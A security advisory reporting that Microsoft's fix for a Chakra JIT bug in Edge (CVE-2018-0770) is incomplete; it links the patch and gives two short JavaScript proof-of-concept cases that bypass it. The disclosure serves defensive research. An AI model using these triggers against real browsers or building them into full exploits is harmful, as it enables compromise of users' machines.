Microsoft Edge Chakra JIT Incomplete Fix

`Microsoft Edge: Chakra: JIT: Incomplete fix for issue 1365  
  
CVE-2018-0770  
  
  
It seems this is the patch for the bug.  
<a href="https://github.com/Microsoft/ChakraCore/pull/4226/commits/874551dd00ff6f404e593c7e0162efb54b953f5a" title="" class="" rel="nofollow">https://github.com/Microsoft/ChakraCore/pull/4226/commits/874551dd00ff6f404e593c7e0162efb54b953f5a</a>  
  
The following two cases will bypass the fix.  
  
1:  
function opt() {  
let obj = new Number(2.3023e-320);  
for (let i = 0; i < 1; i++) {  
obj.x = 1;  
obj = +obj;  
obj.x = 1;  
}  
}  
  
function main() {  
for (let i = 0; i < 100; i++) {  
opt();  
}  
}  
  
main();  
  
2:  
function opt() {  
let obj = '2.3023e-320';  
for (let i = 0; i < 1; i++) {  
obj.x = 1;  
obj = +obj;  
obj.x = 1;  
}  
}  
  
function main() {  
for (let i = 0; i < 100; i++) {  
opt();  
}  
}  
  
main();  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`